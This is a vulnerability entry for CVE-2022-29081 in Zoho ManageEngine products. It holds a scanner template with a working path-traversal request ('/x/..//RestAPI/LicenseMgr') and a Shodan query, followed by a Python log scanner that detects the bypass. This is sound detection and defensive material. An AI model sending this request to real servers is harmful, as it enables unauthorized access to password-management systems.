Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few REST API URLs (SSOutAction, SSLAction, LicenseMgr, GetProductDetails, GetDashboard, FetchEvents, and Synchronize) via the ../RestAPI substring.

PoC code [publicly available]
id: CVE-2022-29081

info:
  name: Zoho ManageEngine - Access Control Bypass
  author: 0xanis
  severity: critical
  description: |
    Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few REST API URLs (SSOutAction, SSLAction, LicenseMgr, GetProductDetails, GetDashboard, FetchEvents, and Synchronize) via the ../RestAPI substring.
  impact: |
    Attackers can bypass access controls on REST API endpoints, potentially leading to unauthorized data access or manipulation.
  remediation: |
    Update to the latest versions of Access Manager Plus, Password Manager Pro, and PAM360 that address this issue.
  reference:
    - https://www.tenable.com/security/research/tra-2022-14
    - https://www.manageengine.com/privileged-session-management/advisory/cve-2022-29081.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29081
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29081
    epss-score: 0.84708
    epss-percentile: 0.99421
    cwe-id: CWE-22
  metadata:
    shodan-query: http.title:"manageengine"
    verified: true
    max-request: 1
  tags: cve,cve2022,zoho,manageengine,auth-bypass,vkev

http:
  - raw:
      - |
        POST /x/..//RestAPI/LicenseMgr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=getLicenseDetails

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"BUILD_NO"'
          - '"LICENSE_TO"'
          - '"VERSION"'
          - '"PRODUCT_NAME"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a76f099df1e418132573a12e3708968849d6a4f77e21ad8705e4f969b515c3070221009229448de3e7476f9a29955318053becfdaec0649994b8e77e091ea0bce4ebb2:922c64590222798bb761d5b6d8e72950
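As a defender-side check added here (not part of the advisory or the Nuclei template), the following Python scans web-server access-log lines for requests whose path only resolves to /RestAPI/ after `..` and duplicate-slash segments are collapsed, which is the request shape the template sends; the log lines, IP addresses and the assumption that legitimate clients address /RestAPI/ directly are all constructed for the example.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed access-log lines (not real traffic). The second and third mimic the
# "../RestAPI" request shape from the CVE-2022-29081 template; the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "POST /RestAPI/LicenseMgr HTTP/1.1" 401 0
10.0.0.9 - - [01/Jan/2023:10:00:01 +0000] "POST /x/..//RestAPI/LicenseMgr HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2023:10:00:02 +0000] "GET /api/../RestAPI/GetProductDetails HTTP/1.1" 200 300
10.0.0.7 - - [01/Jan/2023:10:00:03 +0000] "GET /static/app.js HTTP/1.1" 200 1024
"""

# Common Log Format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def resolve_path(raw_path):
    """Decode percent-encoding and collapse '//' and '..' segments, i.e. the view a
    lenient router ends up with after the access-control layer saw the raw string."""
    decoded = unquote(raw_path.split("?", 1)[0])
    return normpath(re.sub(r"/+", "/", decoded))


def is_restapi_bypass(raw_path):
    """Flag a request that reaches /RestAPI/ only after path normalization.
    Assumption (constructed, not from the advisory): legitimate clients call /RestAPI/ directly."""
    return resolve_path(raw_path).startswith("/RestAPI/") and not raw_path.startswith("/RestAPI/")


def find_bypass_attempts(log_text):
    """Return (ip, raw path, resolved path, status) for each suspicious request.
    A 200 on such a path is the strongest signal: the server answered the hidden endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_restapi_bypass(m["path"]):
            hits.append((m["ip"], m["path"], resolve_path(m["path"]), int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, raw, resolved, status in find_bypass_attempts(SAMPLE_LOG):
        print(f"{ip} {raw} -> {resolved} (HTTP {status})")
```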